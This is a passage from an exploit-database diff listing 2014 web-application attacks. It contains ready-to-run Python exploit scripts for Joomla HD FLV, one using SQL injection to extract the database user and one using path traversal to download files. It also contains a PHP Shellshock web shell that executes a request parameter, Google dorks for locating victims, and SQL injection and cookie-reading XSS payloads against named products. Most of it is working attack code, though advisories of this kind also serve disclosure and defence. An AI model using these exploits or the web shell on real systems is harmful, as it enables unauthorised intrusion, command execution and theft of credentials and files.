+POST Parameter 	: ranger_user[name]
+
+Sample HTTP POST Request - Data only:
+-------------------------------------
+ranger_user%5Bname%5D=admin%27%20AND%203402%3D%28CASE%20WHEN%20%28ASCII%28SUBSTRC%28%28SELECT%20%28CASE%20WHEN%20%28%28SELECT%20GRANTED_ROLE%20FROM%20DBA_ROLE_PRIVS%20WHERE%20GRANTEE%3DUSER%20AND%20GRANTED_ROLE%3DCHR%2868%29%7C%7CCHR%2866%29%7C%7CCHR%2865%29%29%3DCHR%2868%29%7C%7CCHR%2866%29%7C%7CCHR%2865%29%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%2C1%2C1%29%29%20%3E%2047%29%20THEN%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28102%29%7C%7CCHR%28100%29%7C%7CCHR%28114%29%2C5%29%20ELSE%203402%20END%29%20AND%20%27a%27%3D%27a&ranger_user%5Bpassword%5D=secuid0&commit=Login&ranger_user_i2%5Bfeatures%5D=0
+
+Effect, the page will load with a delay of 5 seconds if the current database user is a member of the database administrators.
+
+Using similar SQL statements an unauthenticated malicious visitor is able to enumerate various information from the backend database including those of usernames and password hashes (select ranger_user_name,hashed_password from ROCDB.PASSWORDS where rownum<2). The hashes can further be cracked and be used to access the application. Obviously if the DB user for the application has enough privileges you may be able to own the whole Oracle server.
+
+
+[Timeline]
+09/05/2012 - Advisory created, contacted Subex
+15/05/2012 - Subex responded
+15/05/2012 - Advisory details shared
+17/05/2012 - Subex covered the issue in the latest patch cycle
+30/08/2014 - Advisory published

platforms/multiple/webapps/35219.txt

@@ -0,0 +1,105 @@
+Document Title:
+============
+Proticaret E-Commerce Script v3.0 >= SQL Injection
+
+Release Date:
+===========
+13 Nov 2014
+
+Product & Service Introduction:
+========================
+Proticaret is a free e-commerce script.
+
+Abstract Advisory Information:
+=======================
+BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0
+
+Vulnerability Disclosure Timeline:
+=========================
+20 Oct 2014	:	Contact with Vendor
+20 Nov 2014	:	Vendor Response
+June 26, 2014 	:	Patch Released
+13 Nov 2014	:	Public Disclosure
+
+Discovery Status:
+=============
+Published
+
+Affected Product(s):
+===============
+Promist Bilgi ?leti?im Teknolojileri A.?
+Product: Proticaret E-commerce Script v3.0 >=
+
+Exploitation Technique:
+==================
+Remote, Unauthenticated
+
+
+Severity Level:
+===========
+Critical
+
+Technical Details & Description:
+========================
+SQL Injection
+
+Proof of Concept (PoC):
+==================
+Proof of Concept
+
+Request:
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <tem:GetProductCodes>
+         <!--Optional:-->
+         <tem:Code>1' from Users where (select top 1 password from users where userId=101)>1-	-</tem:Code>
+         <!--Optional:-->
+         <tem:StartWith>?</tem:StartWith>
+      </tem:GetProductCodes>
+   </soapenv:Body>
+</soapenv:Envelope>
+
+Response:
+
+<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
+   <soap:Body>
+      <soap:Fault>
+         <faultcode>soap:Server</faultcode>
+         <faultstring>System.Web.Services.Protocols.SoapException: Server was unable to process request. ---> System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'secretpassword' to data type int.
+   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
+   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
+   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)
+   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)
+   at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows)
+   at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more)
+   at System.Data.SqlClient.SqlDataReader.Read()
+   at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)
+   --- End of inner exception stack trace ---</faultstring>
+         <detail/>
+      </soap:Fault>
+   </soap:Body>
+</soap:Envelope>
+
+
+Solution Fix & Patch:
+================
+Apply the patch for v3.0
+
+Security Risk:
+==========
+The risk of the vulnerabilities above estimated as critical.
+
+Credits & Authors:
+==============
+Bilgi Güvenli?i Akademisi
+
+Disclaimer & Information:
+===================
+The information provided in this advisory is provided as it is without any warranty. BGA disclaims all  warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
+			
+Domain:	www.bga.com.tr
+Social:		twitter.com/bgasecurity
+Contact:	bilgi@bga.com.tr
+	
+Copyright © 2014 | BGA

platforms/multiple/webapps/35220.txt

@@ -0,0 +1,198 @@
+#!/usr/bin/python
+#
+# Exploit Title :  Joomla HD FLV 2.1.0.1 and below SQL Injection
+#
+# Exploit Author : Claudio Viviani
+#
+# Vendor Homepage : http://www.hdflvplayer.net/
+#
+# Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
+#
+# Dork google 1:  inurl:/component/hdflvplayer/
+# Dork google 2:  inurl:com_hdflvplayer    
+#
+# Date : 2014-11-11
+#
+# Tested on : BackBox 3.x/4.x
+#
+# Info: The variable "id" is not sanitized (again)
+#       Over 80.000 downloads (statistic reported on official site)
+#
+#
+# Video Demo: http://youtu.be/-EdOQSjAhW8
+#
+# Poc: 
+#      http://www.target.it/index.php?option=com_hdflvplayer&id=1[Sqli]
+#      http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6 [SQLi]/page/1 (url rewrite)
+#
+# Poc sqlmap:
+#            sqlmap -u "http://www.target.it/index.php?option=com_hdflvplayer&id=1" -p id --dbms mysql
+#            sqlmap -u "http://www.target.it/index.php/component/hdflvplayer/182/title/Blabla-bleblo/id/6*" --dbms mysql (url rewrite)
+#
+# http connection
+import urllib, urllib2
+# string manipulation
+import re
+# Errors management
+import sys
+# Args management
+import optparse
+
+# Check url
+def checkurl(url):
+    if url[:8] != "https://" and url[:7] != "http://":
+        print('[X] You must insert http:// or https:// procotol')
+        sys.exit(1)
+    else:
+        return url
+
+banner = """
+        _______                      __           ___ ___ ______      
+       |   _   .-----.-----.--------|  .---.-.   |   Y   |   _  \     
+       |___|   |  _  |  _  |        |  |  _  |   |.  1   |.  |   \    
+       |.  |   |_____|_____|__|__|__|__|___._|   |.  _   |.  |    \   
+       |:  1   |                                 |:  |   |:  1    /   
+       |::.. . |                                 |::.|:. |::.. . /    
+       `-------'                                 `--- ---`------'     
+        _______ ___     ___ ___     _______ __                        
+       |   _   |   |   |   Y   |   |   _   |  .---.-.--.--.-----.----.
+       |.  1___|.  |   |.  |   |   |.  1   |  |  _  |  |  |  -__|   _|
+       |.  __) |.  |___|.  |   |   |.  ____|__|___._|___  |_____|__|  
+       |:  |   |:  1   |:  1   |   |:  |            |_____|           
+       |::.|   |::.. . |\:.. ./    |::.|                              
+       `---'   `-------' `---'     `---' 
+                                              <= 2.1.0.1 Sql Injection
+
+                                Written by:
+
+                              Claudio Viviani
+
+                           http://www.homelab.it
+
+                              info@homelab.it
+                          homelabit@protonmail.ch
+
+                      https://www.facebook.com/homelabit
+                        https://twitter.com/homelabit
+                      https://plus.google.com/+HomelabIt1/
+             https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+"""
+
+commandList = optparse.OptionParser('usage: %prog -t URL')
+commandList.add_option('-t', '--target', action="store",
+                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
+                  )
+
+options, remainder = commandList.parse_args()
+
+# Check args
+if not options.target:
+    print(banner)
+    commandList.print_help()
+    sys.exit(1)
+
+host = checkurl(options.target)
+
+checkext = 0
+
+evilurl = { '/index.php?option=com_hdflvplayer&id=-9404%20UNION%20ALL%20SELECT%20CONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29' : '/index.php?option=com_hdflvplayer&id=[SQLi]' }
+
+char = "%2CNULL"
+endurl = "%2CNULL%23"
+bar = "#"
+
+print(banner)
+
+headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
+
+sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
+
+try:
+   req = urllib2.Request(host+'/index.php?option=com_hdflvplayer&task=languagexml', None, headers)
+   response = urllib2.urlopen(req).readlines()
+
+   for line_version in response:
+
+      if not line_version.find("<?xml version=\"1.0\" encoding=\"utf-8\"?>") == -1:
+         checkext += 1
+      else:
+         checkext += 0
+
+   if checkext > 0:   
+      sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
+   else:
+      sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n")
+      sys.exit(1)
+ 
+except urllib2.HTTPError:
+   sys.stdout.write("\r[+] Searching HD FLV Extension...: Not Found\n")
+   sys.exit(1)
+
+except urllib2.URLError as e:
+   print("\n[X] Connection Error: "+str(e.code))
+   sys.exit(1)
+
+print("")
+
+sys.stdout.write("\r[+] Checking Version: ")
+
+try:
+   req = urllib2.Request(host+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
+   response = urllib2.urlopen(req).readlines()
+  
+   for line_version in response:
+
+      if not line_version.find("<version>") == -1:
+
+         VER = re.compile('>(.*?)<').search(line_version).group(1)
+
+         sys.stdout.write("\r[+] Checking Version: "+str(VER))
+
+except urllib2.HTTPError:
+   sys.stdout.write("\r[+] Checking Version: Unknown")
+
+except urllib2.URLError as e:
+   print("\n[X] Connection Error: "+str(e.code))
+   sys.exit(1)
+
+print("")
+
+for exploiting, dork in evilurl.iteritems():
+
+   s = ""
+   barcount = ""
+   for a in range(1,100):
+      
+      s += char
+      try:
+         req = urllib2.Request(host+exploiting+s+endurl, None, headers)
+         response = urllib2.urlopen(req).read()
+
+         if "h0m3l4b1t" in response:
+            print "\n[!] VULNERABLE"
+            current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response).group(1)
+            print "[*] Username: "+str(current_user)
+            print ""
+            print "[*] 3v1l Url: "+host+exploiting+s+endurl
+            sys.exit(0)
+
+      except urllib2.HTTPError as e:
+         response = e.read()
+         if "h0m3l4b1t" in response:
+            print "\n[!] VULNERABLE"
+            current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response).group(1)
+            print "[*] Username: "+str(current_user)
+            print ""
+            print "[*] 3v1l Url: "+host+exploiting+s+endurl
+            sys.exit(0)
+
+      except urllib2.URLError as e:
+         print("\n[X] Connection Error: "+str(e.code))
+         sys.exit(1)
+
+      barcount += bar
+      sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
+      sys.stdout.flush()
+
+print "\n[X] Not vulnerable :("
+print "[X] Try with tool like sqlmap and url "+host+"/index.php?option=com_hdflvplayer&id=1 (valid id number)"

platforms/multiple/webapps/35248.txt

@@ -0,0 +1,21 @@
+# Exploit Title: clientResponse Client Management XSS Vulnerability
+# Date: 14-10-2014
+# Exploit Author: Halil Dalabasmaz
+# Version: v4.1
+# Vendor Homepage:
+http://codecanyon.net/item/clientresponse-responsive-php-client-management/3797780
+# Tested on: Chrome & Iceweasel
+
+# Vulnerability Description:
+
+===Stored XSS===
+The message system of script is not secure. You can run XSS payloads on
+"Subject" and "Message" inputs. If you use "Subject" input for attack and
+send the message to admin when admin login the system it will be directly
+affect by vulnerability. Also profile section inputs are vulnerable.
+
+Sample Payload for Stored XSS: "><script>alert(document.cookie);</script>
+
+=Solution=
+Filter the input fields against to XSS attacks.
+================

platforms/php/webapps/35146.txt

@@ -0,0 +1,35 @@
+# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
+# Google Dork: none
+# Date: 10/31/2014
+# Exploit Author: Ryan King (Starfall)
+# Vendor Homepage: http://php.net
+# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
+# Version: 5.* (tested on 5.6.2)
+# Tested on: Debian 7 and CentOS 5 and 6
+# CVE: CVE-2014-6271
+
+<?php
+function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ 
+mail.c:283
+   if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
+     $tmp = tempnam(".","data");
+     putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
+     // In Safe Mode, the user may only alter environment variables 
+whose names
+     // begin with the prefixes supplied by this directive.
+     // By default, users will only be able to set environment variables 
+that
+     // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is 
+empty,
+     // PHP will let the user modify ANY environment variable!
+     mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually 
+send any mail
+   }
+   else return "Not vuln (not bash)";
+   $output = @file_get_contents($tmp);
+   @unlink($tmp);
+   if($output != "") return $output;
+   else return "No output, or not vuln.";
+}
+shellshock($_REQUEST["cmd"]);
+?>

platforms/php/webapps/35159.txt

@@ -0,0 +1,80 @@
+Advisory ID: 92152
+Product: MODX Revolution
+Vendor: MODX
+Vulnerable Version(s):  2.0.0?2.2.14
+Tested Version: 2.2.14
+Advisory Publication:  16 July, 2014  [without technical details]
+Vendor Notification: 16 July, 2014 
+Vendor Patch: 15 July, 2014 
+Public Disclosure: 2 November , 2014 
+Vulnerability Type: CSRF Tokens Bypass + Reflected Cross Site Scripting + Stored XSS
+CVE Reference: Requested
+Risk Level: Critical
+Solution Status: Fixed by Vendor
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
+Patch - Upgrade to MODX Revolution 2.2.15. Due to the nature of this issue and the number of files requiring changes the solution is to upgrade. No installable patch or fileset is available for prior versions
+
+Reported By  - Narendra Bhati ( R00t Sh3ll)
+Security Analyst  @ Suma Soft Pvt. Ltd. , Pune ( India )IT Risk & Security Management Services , Pune ( India)
+Facebook - https://facebook.com/narendradewsoft
+twitter - https://www.twitter.com/NarendraBhatiNB
+Blog - http://hacktivity.websecgeeks.com
+Email - bhati.contact@gmail.com
+
+-----------------------------------------------------------------------------------------------
+
+Advisory Details:
+
+Narendra Bhati discovered vulnerability in MODX Revolution, which can be exploited to perform Cross-Site Scripting (XSS) attacks & Along With Bypassing CSRF Tokens Protection ,Its allow an attacker to perform A CSRF Attack alosing With XSS to take over victim account by changin promary email address , Sending forged request Etc , Tricking an admin to attack on their own users by sending specially crafter malicous payload as CSRF Attack
+
+
+1) Cross Site Request Forgery Protection (CSRF) Tokens Bypassing in Modx Revolution
+
+The vulnerability exists due to insufficient validation of csrftokens ["HTTP_MODHAUTH] at server side which allow an attacker to Perform CSRF Attack by bypassing CSRF Protection Mechanism To take over victim account , Trick him to send malicious request Etc. 
+
+
+------------------------------------------------------------------------------------
+2) Reflected Cross-Site Scripting (XSS) in MODX Revolution
+
+The vulnerability exists due to insufficient sanitization of input data passed via the "context_key" HTTP GET parameter to "http://127.0.0.1/day/modx/manager/index.php?a=55&class_key=modStaticResource&context_key=" URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
+This vulnerability can be used against website administrator to perform phishing attacks, steal potentially sensitive data and gain complete control over web application.
+
+The exploitation example below uses the ""></script><img src=x onerror=prompt(/XSS/)>" JavaScript function to display "/XSS/" word:
+
+Vulnerable URL - http://127.0.0.1/day/modx/manager/index.php?a=55&class_key=modStaticResource&context_key="></script><img src=x onerror=prompt(/XSS/)>
+
+Vulnerable Parameter - "context_key"
+
+XSS Payload - "></script><img src=x onerror=prompt(/XSS/)>
+
+"></script><img src=x onerror=prompt(document.cookie)>
+
+-----------------------------------------------------------------------------------------------
+
+3) Stored Cross-Site Scripting (XSS) in MODX Revolution
+
+The vulnerability exists due to insufficient sanitization of input data passed via the "context" HTTP POST parameter to " http://127.0.0.1/day/modx/manager/index.php?id=1" URL. A local attacker [Authenticated User] can  execute arbitrary HTML and script code in browser in context of the vulnerable website.
+This vulnerability can be used against website visitors to perform phishing attacks, steal potentially sensitive data and gain complete control over web application.
+
+The exploitation example below uses the "<script>alert(1)</script>" JavaScript function to display "1" word:
+
+Vulnerable URL - http://127.0.0.1/day/modx/manager/index.php?id=1
+
+Vulnerable Parameter - "context"
+
+XSS Payload - <script>alert(1)</script>
+
+Note - This Stored XSS Was more critical because there was a CSRF protection vulnerability also , which allow an attacker to trick an administrator To Send Unwated Request for Stored XSS , which will directly attack to the Visitors ,
+
+
+-----------------------------------------------------------------------------------------------
+Solution:
+
+Upgrade to MODX Revolution 2.2.15. Due to the nature of this issue and the number of files requiring changes the solution is to upgrade. No installable patch or fileset is available for prior versions
+More Information:
+Public Advisory By Vendor :- http://forums.modx.com/thread/92152/critical-login-xss-csrf-revolution-2-2-1-4-and-prior
+Public Disclosure With Tecnical Details - http://hacktivity.websecgeeks.com/modx-csrf-and-xss/
+-----------------------------------------------------------------------------------------------
+
+
+

platforms/php/webapps/35193.txt

@@ -0,0 +1,43 @@
+# Exploit Title: VLD Personal – Multiple Vulnerabilities
+# Date: 09/11/2014
+# Exploit Author: Mr T
+# Exploit Authors Website: http://www.securitypentester.ninja
+# Vendor Homepage: http://www.vldpersonals.com/
+# Software Link: http://www.vldpersonals.com/clients/downloads.php
+# Vulnerable Version: 2.7
+# Fixed Version 2.7.1
+# Tested on: Windows / Linux
+
+XSS Attack
+
+Issue detail:
+The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9811c”><script>alert(1)</script>b7ec317c816 was submitted in the id parameter.
+
+Response :
+GET /index.php?m=member_profile&p=profile&id=9811c”><script>alert(1)<%2fscript>b7ec317c816 HTTP/1.1
+
+
+
+SQL Injection:
+Issue detail:
+The country/gender1/gender2 parameter appears to be vulnerable to SQL injection attacks. The payload and benchmark(20000000,sha1(1))– was submitted in the country parameter. 
+
+Response:
+POST /index.php?m=search HTTP/1.1
+Host: localhost
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Referer: http://localhost/index.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 92
+Cookie: visitors=x466x3878x3725x3797; PHPSESSID=nu75qtji88q4bilghhtg2s2; sessdata=0
+>age_from=19&age_to=19&issearch=1&submit=Search&gender1=2
+>&gender2=2&type_id=members
+>&country=
+>1%20and%20benchmark(20000000%2csha1(1))–%20
+
+
+-- 
+Talib Osmani

platforms/php/webapps/35246.py

@@ -0,0 +1,196 @@
+#!/usr/bin/env python
+#
+# Exploit Title :  Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability
+#
+# Exploit Author : Claudio Viviani
+#
+# Vendor Homepage : http://www.hdflvplayer.net/
+#
+# Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
+#
+# Dork google 1:  inurl:/component/hdflvplayer/
+# Dork google 2:  inurl:com_hdflvplayer    
+#
+# Date : 2014-11-11
+#
+# Tested on : BackBox 3.x/4.x
+#
+# Info: 
+#       Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=
+#       The variable "f" is not sanitized.
+#       Over 80.000 downloads (statistic reported on official site)
+#
+#
+# Video Demo: http://youtu.be/QvBTKFLBQ20
+#
+#
+# Http connection
+import urllib, urllib2
+# String manipulation
+import re
+# Time management
+import time
+# Args management
+import optparse
+# Error management
+import sys
+
+banner = """
+        _______                      __           ___ ___ ______
+       |   _   .-----.-----.--------|  .---.-.   |   Y   |   _  \\
+       |___|   |  _  |  _  |        |  |  _  |   |.  1   |.  |   \\
+       |.  |   |_____|_____|__|__|__|__|___._|   |.  _   |.  |    \\
+       |:  1   |                                 |:  |   |:  1    /
+       |::.. . |                                 |::.|:. |::.. . /
+       `-------'                                 `--- ---`------'
+        _______ ___     ___ ___     _______ __
+       |   _   |   |   |   Y   |   |   _   |  .---.-.--.--.-----.----.
+       |.  1___|.  |   |.  |   |   |.  1   |  |  _  |  |  |  -__|   _|
+       |.  __) |.  |___|.  |   |   |.  ____|__|___._|___  |_____|__|
+       |:  |   |:  1   |:  1   |   |:  |            |_____|
+       |::.|   |::.. . |\:.. ./    |::.|
+       `---'   `-------' `---'     `---'
+
+                                         <= 2.1.0.1 4rb1tr4ry F1l3 D0wnl04d
+
+                                Written by:
+
+                              Claudio Viviani
+
+                           http://www.homelab.it
+
+                              info@homelab.it
+                          homelabit@protonmail.ch
+
+                      https://www.facebook.com/homelabit
+                        https://twitter.com/homelabit
+                      https://plus.google.com/+HomelabIt1/
+            https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+"""
+
+# Check url
+def checkurl(url):
+    if url[:8] != "https://" and url[:7] != "http://":
+        print('[X] You must insert http:// or https:// procotol')
+        sys.exit(1)
+    else:
+        return url
+
+
+def checkcomponent(url,headers):
+
+    try:
+        req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php', None, headers)
+        sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
+        print("")
+    except urllib2.HTTPError:
+        sys.stdout.write("\r[+] Searching HD FLV Extension...: Not FOUND :(")
+        sys.exit(1)
+    except urllib2.URLError:
+        print '[X] Connection Error'
+
+def checkversion(url,headers):
+
+    try:
+        req = urllib2.Request(url+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
+        response = urllib2.urlopen(req).readlines()
+
+        for line_version in response:
+
+            if not line_version.find("<version>") == -1:
+
+                VER = re.compile('>(.*?)<').search(line_version).group(1)
+
+                sys.stdout.write("\r[+] Checking Version: "+str(VER))
+        print("")
+
+    except urllib2.HTTPError:
+       sys.stdout.write("\r[+] Checking Version: Unknown")
+
+    except urllib2.URLError:
+        print("\n[X] Connection Error")
+        sys.exit(1)
+
+def connection(url,headers,pathtrav):
+
+    char = "../"
+    bar = "#"
+    s = ""
+    barcount = ""
+
+    for a in range(1,20):
+
+        s += char
+        barcount += bar
+        sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
+        sys.stdout.flush()
+
+        try:
+            req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php?f='+s+pathtrav, None, headers)
+            response = urllib2.urlopen(req)
+
+            content = response.read()
+
+            if content != "" and not "failed to open stream" in content:
+                print("\n[!] VULNERABLE")
+                print("[*] 3v1l Url: "+url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav)
+                print("")
+                print("[+] Do you want [D]ownload or [R]ead the file?")
+                print("[+]")
+                sys.stdout.write("\r[+] Please respond with 'D' or 'R': ")
+
+                download = set(['d'])
+                read  = set(['r'])
+
+                while True:
+                    choice = raw_input().lower()
+                    if choice in download:
+                        filedown = pathtrav.split('/')[-1]
+                        urllib.urlretrieve (url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav, filedown)
+                        print("[!] DOWNLOADED!")
+                        print("[!] Check file: "+filedown)
+                        return True
+                    elif choice in read:
+                        print("")
+                        print content
+                        return True
+                    else:
+                        sys.stdout.write("\r[X] Please respond with 'D' or 'R': ")
+
+        except urllib2.HTTPError:
+            #print '[X] HTTP Error'
+            pass
+        except urllib2.URLError:
+            print '\n[X] Connection Error'
+
+        time.sleep(1)
+    print("\n[X] File not found or fixed component :(")
+
+commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME')
+commandList.add_option('-t', '--target', action="store",
+                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
+                  )
+commandList.add_option('-f', '--file', action="store",
+                  help="Insert file to check",
+                  )
+options, remainder = commandList.parse_args()
+
+# Check args
+if not options.target or not options.file:
+    print(banner)
+    commandList.print_help()
+    sys.exit(1)
+
+print(banner)
+
+url = checkurl(options.target)
+pathtrav = options.file
+
+headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
+
+sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
+checkcomponent(url,headers)
+sys.stdout.write("\r[+] Checking Version: ")
+checkversion(url,headers)
+sys.stdout.write("\r[+] Exploiting...please wait:")
+connection(url,headers,pathtrav)

platforms/php/webapps/35253.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45976/info
+
+web@all is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+web@all 1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/weball/404.php?url=1%3Cscript%3Ealert%280%29%3C%2fscript%3E 

platforms/php/webapps/35254.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45983/info
+
+PivotX is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+PivotX 2.2.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/pivotx/pivotx/modules/module_image.php?image=%3Cscript%3Ealert(0)%3C/script%3E 

platforms/php/webapps/35255.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45984/info
+
+The Uploader Plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Uploader 1.0.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wordpress/wp-content/plugins/uploader/views/notify.php?num=%3Cscript%3Ealert(0)%3C/script%3E

platforms/php/webapps/35257.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45990/info
+
+The WordPress Videox7 UGC Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Videox7 UGC 2.5.3.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-content/plugins/x7host-videox7-ugc-plugin/x7listplayer.php?listid=[xss] 

platforms/php/webapps/35258.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45991/info
+
+The Audio plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Audio plugin 0.5.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-content/plugins/audio/getid3/demos/demo.browse.php?showfile=%3Cscript%3Ealert(0)%3C/script%3E

platforms/php/webapps/35259.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45996/info
+
+PivotX is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+PivotX 2.2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/includes/blogroll.php?id=1&color=123;}</style><script>alert("XSS");</script>| 

platforms/php/webapps/35260.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45996/info
+ 
+PivotX is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+ 
+PivotX 2.2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/includes/timwrapper.php?src=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E 

platforms/php/webapps/35261.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45997/info
+
+The RSS Feed Reader WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+RSS Feed Reader WordPress Plugin 0.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-content/plugins/rss-feed-reader/magpie/scripts/magpie_slashbox.php?rss_url=%3Cscript%3Ealert(0)%3C/script%3E

platforms/php/webapps/35262.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45998/info
+
+The WP Featured Post with Thumbnail Plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+WP Featured Post with Thumbnail Plugin 3.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-content/plugins/wp-featured-post-with-thumbnail/scripts/timthumb.php?src=%3Cscript%3Ealert(0)%3C/script%3E

platforms/php/webapps/35263.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46000/info
+
